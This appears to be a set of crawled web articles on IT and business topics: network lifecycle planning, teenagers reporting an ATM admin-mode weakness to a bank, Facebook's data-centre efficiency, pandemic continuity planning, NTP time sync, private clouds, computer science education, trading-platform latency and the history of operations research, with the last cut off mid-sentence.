Conception, or the beginning of the process, occurs when an organization realizes that change is needed. After obtaining the necessary approvals and securing funding, the transformation process has begun.
The process of transformation requires as much understanding of the past and current network as what the network will need to be in the future. This task is not as simple as it would seem, for the counting and classification of switches and routers is merely the first step.
A comprehensive survey and documentation of all active and passive components is required to determine if anything is re-usable, if right-of-ways or building access points currently in place will meet your needs, and to determine if environmental controls, fire suppression, and backup power are sufficient to support any new equipment.
This is by no means a comprehensive list, but is a good indicator of what is generally required.
In the assessment phase, you will want to evaluate what sensors will be needed in the network. The impact of adding various chemical, biological, radiological, environmental, and video sensors to networked systems can be significant. Increasingly, such monitoring equipment is required in various rooms, buildings, and campuses as a result of heightened security concerns.
While individual sensors may contribute less significantly to the overall network load, large numbers of these sensors acting simultaneously may cause congestion. The resulting data loss can impede the ability to respond to an incident and can inhibit an organization's ability to determine the cause(s) during the critical forensic analysis phase that occurs post-incident.
It is important to point out the specific need to address sensors in this phase because these types of technologies are becoming more common and too often, sensors are implemented into a network without proper planning.
As you continue the assessment, gather all existing documentation and compare it to the infrastructure. Update it as you go.
While it may appear that more emphasis is being put on assessment than on the other areas, that is because it is the most critical element; the other three areas will not function well over time if this step is hurried or overlooked.
After assessment, the seed is planted and you're "pregnant" with the idea of a new environment to operate in. But before birth occurs, like any proud parent, you are planning for its future. This requires architecture and design.
Network design is sometimes looked upon as a process of simply connecting the dots. This is the simplest of design and does not meet the needs of many organizations.
Good network design takes into account all of the servers, applications, storage modules, projected usage patterns, and a well-educated estimate as to future expansion of the network (users and sites.) Robust designs allow the dynamic addition of users and sites, along with the associated traffic, with little or no impact to the original user set.
Begin with an architecture that defines the overall functions of the network but doesn't specify equipment. This is similar to a mechanical engineer designing a vehicle that can accommodate a large payload, or have the capacity to reach 0 to 60 in 6 seconds.
Once accomplished, you can move to a design phase where you choose technologies and vendors, and finalize details such as location, power, fire support, security, access, and other areas are finalized. Include the network management function, spares and maintenance plans, and network elements for help desk as part of the architecture and design functions.
Both the architecture and designs should have written documentation explaining details along with drawings at various levels of complexity. It is critical that the high level perspective of this documentation be understandable by non-technical personnel, as these will be presented for review to executive teams for final approval of funding.
Like a child, a network goes through different stages before becoming an adult. The network may come online in segments, but, as with any building project, implementation begins from the ground up.
In the network world this denotes the elements at the bottom of the open system interconnection (OSI) stack or the cabling. Cable plant is often the most difficult piece to implement, especially if you're required to dig trenches to lay cable between buildings or across town.
These are also the most expensive elements and the longest to deploy as they usually require environmental impact studies, special building permits, and depend on weather conditions in some areas of the country. Short haul wireless solutions can sometimes overcome the need to trench cable.
Building new networks from scratch is often much easier than transforming existing infrastructures, as there is no need to plan around current users. In the case of transforming existing systems, construction must occur in parallel with the functioning network.
After physical build out is complete, the logical elements of routing, security, numbering and naming are installed and tested. To minimize impact to the business, testing must be coordinated with users, especially since they usually involve outage periods or transitioning users from one network to another.
This can be especially tricky when the site also holds applications or storage for mission critical systems. If possible these sites should be tested either first or last in sequence, or they may be transitioned to temporary facilities to minimize impact to the enterprise.
Once a network matures and reaches adulthood, it occasionally needs medical attention.
Circuits, routers, switches, cables, connectors and the like may suffer failure or degradation. Routers need logical "tune ups," users and applications come and go, or new server equipment and storage is needed.
And like an annual physical, all of this equipment and their associated configurations need to be reviewed on a regular schedule to insure optimum performance. It is critical that the documentation of all aspects of the network be maintained and available, just as a medical record for a human must be current and accurate to insure proper treatments are applied.
The transition from an aging, suboptimal networking environment to a modern high-performance network is an involved process. We are often required to relinquish processes, personnel, and equipment that has in the past seen us through difficult times.
As in the cycle of life, this passing of the familiar and safe can be unsettling. And, as in the cycle of life, the birth of a new environment can be welcomed with much celebration. | <urn:uuid:e17290a5-dc4b-464c-9594-341b55576776> | CC-MAIN-2017-04 | http://www.cioupdate.com/insights/article.php/3502296/Life-as-a-Network.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00130-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947017 | 1,372 | 2.5625 | 3 |
For hackers everywhere the prospect of carrying out an ATM attack is like finding the holy grail. Such an incursion presents direct access to money, allowing cybercriminals to bypass any other channels and get right to the good stuff.
One would assume that a breach of an ATM would be malicious, focused on extracting quick cash and disappearing back into the dark recesses of the cybersphere. One may also assume that such an attack would be carried out by an adult, or at least someone old enough to manage his or her own (criminal) finances.
But a recent breach of an ATM in Montreal undermined those two suppositions, since it was neither malicious nor conducted by adults. In this case, the hackers were a couple of high schoolers on lunch break, and their motive was better enterprise security for the bank.
A Rather Productive Lunch Break With Some Great Food For Thought
According to The Winnipeg Sun, Montreal ninth graders Matthew Hewlett and Caleb Turon recently decided that they’d have a unique adventure on a recent lunch break. While the rest of their peers presumably crowded into local restaurants or walked the school halls with brown paper bags in tow, Hewlett and Turon did something entirely different: They went to an ATM operated by the Bank of Montreal. Their goal was simple: Crack the code and gain administrative access to the machine.
But Hewlett and Turon weren’t heading into their hack ill-prepared. Before reaching the ATM, they’d surfed the Web and found an ATM operational guide that described how to get access to the administrative mode of the exact machine they stood in front of during this fateful lunch hour.
It was unclear to the boys if the guide they’d found online would work for the bank’s ATM or if it was outdated.
“We thought it would be fun to try it, but we were not expecting it to work,” Hewlett said later.
Yet after following the instructions from the online printout, they were met with an encouraging sign: A screen, on the ATM, asking them for a password. The only downside was that they had no idea what the password could be. So they typed in 6 common digits — think something along the lines of “123456” or “654321.”
Whatever combination they typed in — according to ZDNet, the exact password isn’t being released to the public — it worked, and the two boys found themselves with administrative access not only to the ATM but also, by extension, to privileged information at the bank.
But then the boys did something that sets them apart from all the malicious hackers out there: They went right to the bank and reported the problem. It took some convincing of the bank staff, but once they did the staff was grateful to the young men for helping expose a major security flaw.
There was only one problem: The boys were late for school.
The bank fixed that by sending them back with a note: “Please excuse Mr. Caleb Turon and Matthew Hewlett for being late during their lunch hour due to assisting BOM with security,”
The message of this story is clear: If a couple of (admittedly enterprising) high schoolers can break into your business’ system, it’s probably time for some better security. | <urn:uuid:9ab74def-dcdf-49df-b4cd-76a23fa0e08f> | CC-MAIN-2017-04 | https://www.entrust.com/two-kids-hack-atm-think/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00553-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.975319 | 692 | 2.71875 | 3 |
Facebook revealed today that it tried using potatoes in its servers to make them more environmentally friendly.
Under the Open Compute Project (OCP), Facebook is on a mission to improve the efficiencies of the servers, storage devices and data centres that are used to power its social networking platform. Any breakthroughs that the company makes are shared with the rest of the OCP community so that they too can improve their own efficiencies and reduce the overall environmental impact of IT on the world.
"We disposed of anything that wasn't useful," said Facebook's VP of hardware design and supply chain operations Frank Frankovsky at a briefing in London.
This included removing the top lids from its servers, but that resulted in a lack of airflow over the central processing unit (CPU), causing them to overheat.
The company tried to use a plastic cover to redirect the airflow over the CPU but this didn't sit well with Frankovsky. "That was really frustrating for me because we eliminated all this material and then we put a plastic lid on the thing," he said. "That's just more material in the waste stream."
Facebook then considered whether it was possible to make the lid out of a more eco-friendly material. Frankovsky confessed that he even tried using the material that is also used to make Spudware kitchen utensils, which are compromised out of 80 percent starch and 20 percent soy oil.
"We created a thermal lid out of that starchy material but we found out pretty quickly that when you heat that up it smells a lot like French Fries," said Frankovsky.
Besides making data centre workers rather peckish, the Spudware material also went floppy and gloopy, he continued.
Frankovsky went on to argue that other datacentre operators should try and "push the envelope a little bit harder" in order to drive innovation and improve efficiencies.
Indeed, Facebook has recorded a power utilisation effectiveness (PUEs) rating of 1.07, which far surpasses the industry's "gold standard" of 1.5.
The PUE is a measure of how much electricity gets to the server compared to how much is taken off the grid.
Facebook is able to achieve such efficiencies partly because it runs its data centres without air conditioning, instead relying on the outside air to cool its servers and prevent them from overheating. This means that it doesn't have to use up electricity for cooling purposes.
The result is a facility that is 38 percent more efficient and 24 percent less expensive than predecessor data centres, said Frankovsky.
Sceptics argue that Facebook is only able to create super efficient data centres because it is building them from scratch, where as normal businesses are committed to their data centres for at least 20 years.
However, Frankovsky pointed out that Facebook was still able to achieve efficiency savings of 30 percent when it was leasing space in someone else's data centre.
"We started turning off computer room air conditioning. We started separating hot aisle from cold aisle," he said. "These were things our co-location landlords hadn't done."
There are very parts of the world that are so hot and humid that you can't get the inlet temperatures to a point where the electronics would survive, according to Frankkovsky.
"Even if air conditioning is not a risk they're willing to take, I think there's a lot that can be done in electrical efficiency. Eliminating the uninterrupted power supply (UPS) would be one easy way. These cost $2 a Watt while the OpenCompute battery racks we've open sourced cost $0.25. It's also far more efficient because they're not transferring the AC to DC."
Facebook has even taken steps to reduce the carbon footprint of the lorries that transport equipment from Germany to its only European data centre, in Lulea, Sweden.
"We design the rack enclosure, as well as the pallets that it transports on, to be able to plug a truck 100 percent so we don't have any wasted space on a truck so we don't have any wasted transportation costs," he said.
This story, "Facebook Tries Putting Spuds in Servers to Make Them More Eco-Friendly" was originally published by Techworld.com. | <urn:uuid:d8344f0c-5aa3-4be2-831f-838abdc7f4f6> | CC-MAIN-2017-04 | http://www.cio.com/article/2382363/data-center/facebook-tries-putting-spuds-in-servers-to-make-them-more-eco-friendly.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00031-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.968409 | 874 | 2.578125 | 3 |
It has been captivating movie-going audiences for years through such classics as 28 Days Later, Outbreak, I am Legend, and most recently, World War Z. Virus outbreaks, plagues and mass infections are just a few of Hollywood’s favorite antagonists to hit the big screen, however, what would happen if these hypothetical pandemics became a reality? Would the public be prepared? How would businesses survive or thrive without their workforce? The answers may be shocking.
Pandemics, which are global outbreaks, and epidemics, or regional outbreaks, have been around as long as the human species, and have obtained notoriety in history books and religious tomes alike. Though modern medicine has limited major occurrences, fast-spreading diseases are on the rise worldwide, including the Ebola virus in Africa, bubonic plague in China and chikungunya virus in the United States. Let’s not forget the all too common influenza virus, which pops up every year during the winter and spring months.
The chances of spreading these diseases from one country to the next have increased, thanks to international travel and mass transit. To combat these threats, companies are now taking a serious look at how they can prepare against such outbreaks.
How companies can place outbreaks above output
According to Insurance Information Institute, 40 percent of businesses affected by a man-made or natural disaster never reopen. This is especially alarming since a majority of companies are not adequately prepared to handle a pandemic or epidemic based on a recent study by Saint Louis University.
One of the main challenges companies face is their lack of knowledge and awareness when it comes to preventing the spread of diseases or germs. While some cultures encourage employees to stay at home when they are ill, others stress working through the day, placing output above outbreaks. This mindset causes companies to spend up to $10.4 billion in hospitalizations and outpatient visits when employees contract, and spread, such viruses as the flu, according to the Centers for Disease Control and Prevention (CDC).
An office environment isn’t the only way germs and diseases are spread. Supply chains are also susceptible to, and mainly responsible for, the spread of illness. When an outbreak occurs, companies must not only protect their employees and internal workforce, but they should also consider their vendors and supply chains to reduce the possibility of transferring bugs and subsequently increasing the chances of a nationwide or worldwide pandemic.
Besides monitoring conditions externally, the most important part of restricting a pandemic or epidemic outbreak is observing employees’ health conditions. It’s especially important to advise sick employees to go home if there is a chance for a virus or bacterial infection to spread to colleagues or customers. According to the CDC, those workers who appear to be contagious should be separated from fellow colleagues, sent home and not return to work until at least 24 hours after they are fever free. Due to the small quarters of an office, it can be difficult to stop the spread of germs, which is why offices should take the time to install hand sanitizers throughout the office, remind staff to clean up their work areas and encourage employees to get vaccinated. A lack of good office hygiene not only creates high healthcare costs, but companies can suffer financially from a reduced workforce, diminished productivity and increased downtime.
Common pandemic misconceptions
Many businesses believe that the only way germs are spread is through direct contact; however, that is not the case in most situations. Transmission routes, which are how a disease is passed, take a number of forms, including:
•Droplet contact – coughing or sneezing on another person
•Direct physical contact – touching an infected person
•Indirect contact – touching a contaminated surface or substance, such as a mosquito spreading chikungunya or a parasitic worm in undercooked food
•Airborne – microorganisms that can remain active in the air for long periods of time
•Fecal-oral – contaminated food or water sources
According to a survey by Harvard’s School of Public Health, two-thirds of companies surveyed said they could not operate if more than half of their employees were out for two weeks or more. By implementing these phases into a business continuity plan, companies can reduce downtime, plug profit leaks and more importantly, safeguard personnel.
Curbing corporate pandemics and epidemics
Similar to a hurricane or tropical threat, the impacts of a pandemic, or an epidemic, can spread through the local community. Schools and government services may close. Retail stores and pharmacies will likely have a shortage of items such as medicine, gas, food and water. There may be a longer wait time at doctor’s offices, urgent care facilities and emergency rooms. To avoid this type of panic among employees, below are four simple steps that companies can apply to their business continuity plan.
START – Confirmed cases are verified.
•Communicate to key stakeholders – Stakeholders are employees, vendors, corporate executives and customers who will be affected by the company’s delays and/or shutdowns. Remind personnel of the preparedness steps the organization has in place, as well as what they should be doing to protect themselves from germs.
•Inventory resources – Take stock in resources available, such as employees, sanitizing materials and what customers and vendors will require to continue operations. This is the time to review employees’ travel plans and determine who is available to help alleviate the extra workload. Remote computing capacities may be the answer to continue workflows.
•Review response plans – Similar to other corporate response plans, a company should already have in place their crisis management team and have defined their roles in response to the event.
ACCELERATE – Two or more cases are confirmed locally or near the office.
•Continue open dialogue – Companies should maintain communication among stakeholders and initiate accountability with personnel. If additional employees become sick, companies should consider travel restrictions for all personnel.
•Commence response strategies – Employers should encourage social distancing and distribution of appropriate office supplies and fuel. For example, if employees or family members are sick, the affected employee should stay home, maintain a three meter radius from fellow colleagues and wipe all surfaces at the beginning and end of a shift.
•Evaluate operations – The crisis management team should determine whether to suspend, transfer or maintain operations.
PEAK – Ten percent of the community is infected.
•Continue communication and accountability with personnel – this includes daily messaging to personnel regarding the infection and spread of the disease.
•Initiate distribution of operations – Continue social distancing and encourage employees to telecommute if more than 25 percent of schools in the area are closed.
•Engage employee assistance program (EAP) – If an employer doesn’t already have an employee assistance program in place, now is the time to create a special plan to assist personnel with private concerns, including access to legal, medical, mental and other professional resources. During a peak pandemic attack, the EAP will serve as a hotline for those individuals who need additional resources and are unable to access the company directly.
DECELERATE – Less than ten percent of the community is infected and the number continues to decline.
•Continue messaging – Employees should be made aware of back-to-work policies. Communicate with both vendors and suppliers about the company’s plans to resume normal workflow.
•Return to normal operations – Employers should encourage personnel to stay home if they are still ill; however, a company’s top priority should be to return to critical staffing levels.
•Continue employee assistance program – Continue the EAP hotline to assist employees with any questions regarding how they will recover from an outbreak and provide the necessary help to their families.
Companies can spend thousands of dollars or more to try to stop the spread of a pandemic or epidemic outbreak once it starts, but there is a simpler way to stop the incident before it starts. Attention to good hygiene is the best line of defense and the most cost effective for companies. Don’t wait until it’s too late - prepare your employees now before their coworkers begin coughing and sneezing. | <urn:uuid:fd094fa4-5927-4df2-af82-78ce6f55e9e8> | CC-MAIN-2017-04 | http://www.continuityinsights.com/article/2014/08/perfect-storm-preparing-next-pandemic | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00479-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94776 | 1,668 | 3.046875 | 3 |
Time synchronization is a service that maintains consistent server time across the network. Time synchronization is provided by the server operating system, not by eDirectory. eDirectory maintains its own internal time to ensure the proper order of eDirectory packets, but it gets its time from the server operating system.
If your network uses Windows or Linux, you should use Network Time Protocol (NTP) to synchronize the servers, because it is a widely-used standard to provide time synchronization.
NTP functions as part of the UDP protocol suite, which is part of the TCP/IP protocol suite. Therefore, a computer using NTP must have the TCP/IP protocol suite loaded. Any computers on your network with Internet access can get time from NTP servers on the Internet.
NTP synchronizes clocks to the Universal Time Coordinated (UTC) standard, which is the international time standard.
NTP introduces the concept of a stratum. A stratum-1 server has an attached accurate time piece such as a radio clock or an atomic clock. A stratum-2 server gets time from a stratum-1 server, and so on.
For more information on time synchronization software, see The Network Time Protocol Web site.
For information on time synchronization for Windows 2000 servers, see Setting Time Synchronization With Windows 2000 Web site.
You can use the xntpd Network Time Protocol (NTP) daemon to synchronize time on Linux servers. xntpd is an operating system daemon that sets and maintains the system time-of-day in synchronism with Internet standard time servers.
For information on running ntpd on Linux systems, see ntpd - Network Time Protocol (NTP) Daemon.
To verify that time is synchronized in the tree, run DSRepair from a server in the Tree that has at least Read/Write rights to the Tree object.
Click> > > .
Run the following command: | <urn:uuid:240dd161-893c-41c7-819c-b387f61c21a6> | CC-MAIN-2017-04 | https://www.netiq.com/documentation/edir88/edir88/data/a2iiies.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00205-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.817159 | 396 | 3.640625 | 4 |
DELL EMC Glossary
What is a Private Cloud
A fully virtualized data center with self-service and automation. Self-service and automation are the critical capabilities that increase agility and differentiate from a virtualized data center.
Who uses private clouds and why?
Mid to large corporate and government entities implement a private cloud to achieve greater business agility, increase efficiency, and gain competitive advantage.
In a traditional IT environment, application software and the supporting hardware is procured, managed, and funded in silos, and generally implemented over a period of months. A private cloud infrastructure enables access to a variety of IT resources in minutes to hours and aligns costs to actual consumption.
By enabling the organization to initiate projects faster, capitalize quickly on new capabilities and revenue opportunities, and respond nimbly to market changes, moving to a private cloud elevates IT from cost center to strategic partner.
How does the private cloud work?
Virtualization technologies provide the foundation for a private cloud, whereby IT resources are uncoupled from physical devices. To fully capture the benefits of a private cloud requires an infrastructure optimized for virtualization and tightly integrated.
Moving from a traditional IT environment to a private cloud and delivering IT-as-a-service (ITaaS) also requires new roles, skills, and significant operational changes. Users access services through a self-service catalog of pre-defined configurations, with usage metered and charged accordingly.
What are the benefits of the private cloud?
• Greater efficiency- resources are virtualized and pooled ensuring physical infrastructure is used to its maximum capacity.
• Greater agility – IT resources can be provisioned on demand and returned to the resource pool just as easily.
• Rapid scalability – instantly allocate additional computing resources to meet business demands due to peak seasons, company growth or decline
• Lower costs - infrastructure, energy, and facility costs, “pay as you use” model
• Greater IT staff productivity – Automated provisioning through self-service portal
• Reduce wasted resources – transparent pricing and metering and chargeback tools allow IT admins to pinpoint where costs can be cut
• Higher utilization of IT investments
• Enhanced security and protection of information assets | <urn:uuid:90db0020-293c-468d-8468-3165ba674f64> | CC-MAIN-2017-04 | https://www.emc.com/corporate/glossary/private-cloud.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00113-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.908577 | 450 | 2.65625 | 3 |
For Obama administration officials, computer science education has become almost a moral issue.
On the occasion of the release of a new report quantifying the economic benefit of the U.S. software industry, senior officials from the White House and the Department of Education described their efforts to expand computer science instruction for K-12 students, and even to introduce basic programming concepts at the preschool level.
[ Related: New programs aim to boost computer science education ]
During a panel discussion at the New America Foundation, Melissa Moritz, deputy director of STEM -- science, technology, engineering and math -- at the Education Department, noted the ethnic and gender imbalances in computer science education. Still a rarity at schools across the country, computer science classes are disproportionately unavailable to low-income students, according to Moritz, who argued that biases -- conscious or unconscious -- deter many minority and female students from pursuing the field that is accounting for more wage growth in the U.S. economy than any other sector.
"One of the big places where the Department of Education has chosen to focus in terms of STEM -- which we include computer science in STEM -- has been around equity, and really wanting to treat computer science access as an equity issue, because it is," Moritz said.
"Most of the kids who do not get to participate in computer science are kids of color, kids in low-income communities and girls. And there's a number of reasons for that. First, it's not offered in their school. Second, we also have to look at who is either encouraged to take it, either explicitly or implicitly," she said.
Computer science for all initiative
Moritz noted the administration's Computer Science for All initiative that aims to universalize computer science education, as well as the president's latest budget proposal, requesting two tracks of funding that would support state and district efforts to expand programming courses in schools.
[ Related: Obama announces computer science for all initiative ]
Those efforts to expand computer science education, along with the work of nonprofit groups like Code.org and many firms in the private sector, find an economic justification in new research from the Economist Intelligence Unit, sponsored by the trade group BSA, which pegged the software industry's contribution to U.S. gross domestic product in 2014 at $1.07 trillion.
That study concluded that software accounts for some 9.8 million jobs -- both in direct employment within software firms and jobs in other fields that are supported by software.
BSA's research cited salary data from the Labor Department, which reported that software developers, on average, earned $108,760 in 2014, compared to the average annual wage for all other jobs of $48,320.
"This can be an incredible opportunity to be able to close very persistent equity gaps that we see in this country because of the high wages that are available," Mortiz said. "You think about the opportunity that going into computer science or a computing-related field provides for a student who is coming from a low-income background in terms of their employment and the amount of money that they can make over the course of their life -- that is huge, but we have to treat it as an equity issue."
[ Related: Who needs a computer science degree these days? ]
Historically, the United States has enjoyed a competitive advantage in the software field when measured against foreign rivals, some speakers noted. But that's no argument for complacency.
Ryan Burke, a senior policy advisor on the White House National Economic Council, recalled a recent visit to Delaware, where she met with local tech employers who reported that they were having a hard time hiring graduates from a local community college, because the instructors there were teaching a programming language that was three years behind what businesses were using in the field.
Burke singled out efforts by Coursera and LinkedIn to better align the type of instruction that colleges and other educational programs are offering with what employers are looking for, stressing that the accelerating pace of change in technology is going to require schools to move more quickly to keep their programs up to date.
"We know that these technology changes are going to lead to job shifting not every decade or century, but every year and month, which means that our education and training programs need to be able to adapt as fast as those jobs needs are changing," Burke said. "We know it's just not happening fast enough."
This story, "Ethnic, gender imbalances plague computer science education" was originally published by CIO. | <urn:uuid:60f13fd9-481f-4342-b7d4-7a230386a64c> | CC-MAIN-2017-04 | http://www.itnews.com/article/3086084/education/ethnic-gender-imbalances-plague-computer-science-education.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00535-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.969982 | 917 | 2.890625 | 3 |
Head-of-line blocking (HOL blocking) in networking is a performance issue that occurs when a bunch of packets is blocked by the first packet in line. It can happen specially in input buffered network switches where out-of-order delivery of packets can occur. A switch can be composed of input buffered ports, output buffered ports and switch fabric.
When first-in first-out input buffers are used, only the first received packet is prepared to be forwarded. All packets received afterwards are not forwarded if the first one cannot be forwarded. That is basically what HOL blocking really is. | <urn:uuid:42b9d930-02c5-4a21-980c-129ef3cdacf7> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/tag/backplane | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00563-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955391 | 122 | 2.59375 | 3 |
To my mind, IT governance is ultimately about having fact-based confidence in achieving desired business outcomes, and these often depend on addressing technical issues. If the desired outcome, for example, is an effective and profitable single dealer platform, which allows a financial institution's customers to deal with it for a range of trading assets (FX, credit, equities and so on) through a single internet application, one of the issues that must be addressed is latency.
So, what is latency? Well, its not the same as response time, which it is sometimes confused with—you can have sub-second response times for, say, pricing information and still see a price on your screen that is out of date, because of latency issues.
Broadly speaking, latency is the time taken for changes in data to reach you from wherever the change is made (whereas response time is usually the time taken to get data out of a local store or cache). Response time is to do with the system supplying something (even a "please wait" message); latency is about it supplying the correct information at a point in time. And latency is is also about consistency; a consistent 250 msecs delay can be managed; an average 250 msecs delay, with delays occasionally stretching to seconds, is a much bigger problem (and life being what it is, you can bet that the delayed transaction is an important one).
There will always be some latency—no message can travel faster than the speed of light (until quantum entanglement can be exploited, that is), which imposes a measurable delay, and every network node a message passes through imposes a rather more significant delay on top of this. However, in a system dealing with human traders, the time taken for a human to make a decision and press a key imposes a sensible limit on how low latency needs to be. This isn't necessarily the case for "high speed trading" between computers but the issues are similar, just orders of magnitude more difficult to deal with, and I won't talk about them here.
Imagine a market moves (perhaps someone dumps a large quantities of stock in in Hong Kong) at 12:00:00 GMT. Immediately, the price of the security changes, as a result of the deal, in Hong Kong; and financial databases around the world then start to synchronise on the new price. However, this will take some time.
Suppose the news of the new price takes a second-and-a-quarter to reach London—probably unacceptable but not unthinkable. Now, what happens if a financial institution's client in London purchases the security in London at 12:00:01 GMT, on the basis of the price on his/her screen at 12:00:01 in London, before the 12:00:00 change arrives. What price does he pay—the price actually in effect at 12:00:01 or the 11:00:59 price, before the Hong Kong deal, which is what he/she is seeing in London?
Well, it depends. If the transaction is "request for quote", the financial institution will recheck the price before making the sale and usually accept it if the price has not moved or moved in the financial institution's favour and reject it if it has moved in the client's favour. If latency is a problem, the client will be making buying decisions based on out-of-date information and probably, as a result, experiencing a lot of rejected trades—resulting in an unhappy customer (even more so if the customer finds out that he/she lost out significantly on accepted trades). However, many institutions would like to move to a "click to trade" system, where the trade is made immediately without further checks and the financial institution honours the price its client saw on his/her screen, because this places fewer barriers in the way of trading and should increase business. Now, the financial institution is much more exposed to latency as it has to complete the deal even if the price has moved against it and, with a big securities deal, the difference in price might be many thousands of dollars. So, the financial institution will monitor latency and will probably grey out the "click to trade" option if latency increases beyond about 400 msec, say, which is of the order of magnitude of the brain's response time. Now we have unhappy customers again and if the "click to trade" option is greyed out often enough, the financial institution also, in effect, loses a potential sales channel.
So, why is latency a problem now, when it should be rather smaller than it used to be when communication was by telegraph and telephone? Well, Internet communications have increased customer expectations (although Internet latency is far from deterministic) and the importance of electronic channels; and strengthening regulation (MiFID, in retail equities trading, is an example of the way regulators are thinking) are increasing transparency. Badly managed latency does not increase customer confidence, is becoming harder to hide and, in extreme cases, could attract the attention of the regulators.
As I said, some latency is unavoidable but it is easiest to manage if it is consistent, across channels, across time and as workload increases. And, the smaller the absolute latency is, the less any remaining inconsistencies will matter. The worst case is a channel with significantly worse latency than alternative channels carrying the same information (leading to possible arbitrage opportunities), where the actual latency experienced by any particular transaction varies widely and increases unpredictably as the channel approaches capacity.
Managing response time is relatively straightforward (chiefly, avoiding design bottlenecks and providing plenty of cache). Latency is much harder to manage, quite apart from the speed of light limitation. Latency can be introduced by network nodes (switches, routers and so on), Internet routing problems, overloaded databases, security technology (firewalls) and even manual authentication processes. As long as it is deterministic and known, it can be allowed for, but if random messages experience very high latency the business service becomes unmanageable.
What this all means is that latency must be explicitly addressed in the design of any computerised system where it might be a factor. It can't simply be left to chance—buying fast computers and fast networks is no guarantee that latency issues won't arise when the system is overloaded or hardware fails—or even with certain combinations of transactions.
One useful approach is to adopt an inherently low-latency framework, which manages communications latency for you and provides an API on each side of its channel. So all your programmers have to worry about is the value-add your processes deliver to your customers (and latency outside the communications channel), not about the skilled and specialist job of designing low-latency infrastructure.
An example of such a framework comes with Caplin's Xaqua, an Internet-based single dealer platform financial hub for exchanging trade messages and market data with subscribers, that is network agnostic and tunnels through proxy servers and firewalls automatically. Caplin Liberator is the component of Caplin Xaqua which provides two-way low-latency web streaming of financial data.
Caplin supplies benchmaking tools suited to streaming applications—its inherently low and consistent latency comes from its streaming design, although its absolute performance depends on the power of the platform it's running on, of course. Caplin Benchtools can create multiple concurrent client sessions subscribed to real-time updating objects—the same load conditions that real end-users experience when connecting to Liberator over the Internet—and test the sort of persistent HTTP streaming connections that most HTTP load testing tools have difficulty with.
Depending on the workload characteristics, end-to-end latency ranges from about 50 msecs to about 250 msecs. using sensible hardware. However what is interesting is that Caplin claims to show that latency on its platform remains just about constant as client numbers increase up to the point where capacity is reached (where latency goes through the roof) and the actual latency experienced clusters around a single value. The distribution of legacy and the way it changes with load is more important (within reason) than the actual values and achieving these characteristics is non-trivial. Hence the advisability of using a tried-and-tested framework and the need for tools which can simulate the workloads you are likely to encounter.
So, we have here is a situation where a technology solution to managing latency can be seen as part of "good IT governance", and has to deliver compliance with internal policies for "acceptable latency". However, failing to implement good governance in this area isn't about failing to check a box or meet some industry good practice standard or even about the possibility of annoying some regulators. It's about having increasingly unhappy customers and being unable to implement an innovative channel to market that could deliver more customers and higher profits.
IT governance can be seen, in part, as giving the business confidence that its technology can support, in this case, its business Internet trading strategies and vision, at the business level. | <urn:uuid:96c10305-1410-4fbe-b5de-85bea8cced43> | CC-MAIN-2017-04 | https://www.bloorresearch.com/blog/the-norfolk-punt/latency-an-it-governance-story-p1/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00471-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947059 | 1,832 | 2.53125 | 3 |
Operations research (OR) is the use of quantitative techniques (statistics, etc.) to solve problems and help leaders make decisions. OR has been around for centuries, but in the decade before World War II it came to be recognized as a distinct discipline. Operations research was used extensively during World War II to solve numerous problems; everything from how best to use radar or hunt submarines to running factories and getting supplies to the troops efficiently. Following this wartime experience, there were even more numerous peacetime successes. This led to OR being called "Management Science." OR is still widely used in military applications.
Why is it that OR never gets any respect? Operations Research is, arguably, the most important scientific development of the 20th century. OR, like the earlier Scientific Method, is basically a management technique. Management is also a 20th century concept that gets little respect. In some respects, OR is the combination of management principles and the Scientific Method. Without the breakthroughs in management techniques, the enormous scientific progress of the 20th century would not have been possible.
Unfortunately, management is, like the air we breathe, something most of us take for granted. But take away the air, or the management, and you notice the absence real quick. Techniques have always had difficulty getting attention. You cannot see them. Objects, on the other hand, are easy to spotlight and promote in the media. Even genetic engineering can generate pictures of new proteins, or the latest crop of clones. But how do you get a picture of OR in action? Someone playing with a slide rule or workstation don't quite cut it. It's so bad that the most common representation of engineers at work is Dilbert. And no one has ever asked me to talk about OR on TV or radio.
OR The Ancient Art
Part of the problem is that OR has actually been around for thousands of years, it just wasn't codified until the 20th century. From Alexander the Great to Thomas Edison, we have records of great men applying OR methods to problems. They just didn't call it OR. But if you examine what they did, it was. Consider some of the examples. Alexander the Great, and his father Philip, had a firm grasp of politics, finance and mathematics. There was no magic involved in how Philip came out of nowhere and dominated the more powerful Greeks. His son was equally astute, coming up with one clever solution after another. Alexander was always in the company of mathematicians and scientists, something which Greece had an abundance of at the time. Military, scientific and political problems were all carefully thought out and solutions adroitly implemented. Take a close look at the period and you'll recognize a lot of OR at work. The Romans were equally adept, and much OR can be seen as they built the largest empire of the ancient period. Napoleon, who was educated as a mathematician, again used OR tools to innovate and accomplish his goals. And then there was Thomas Edison, the most prolific inventor ever. He gave a splendid example of military OR in action two decades before OR was recognized as a discipline. Asked by the US Navy to help in dealing with German subs and the threat to US shipping, Edison analyzed the situation and came up with the convoy system and much of what we now think of as 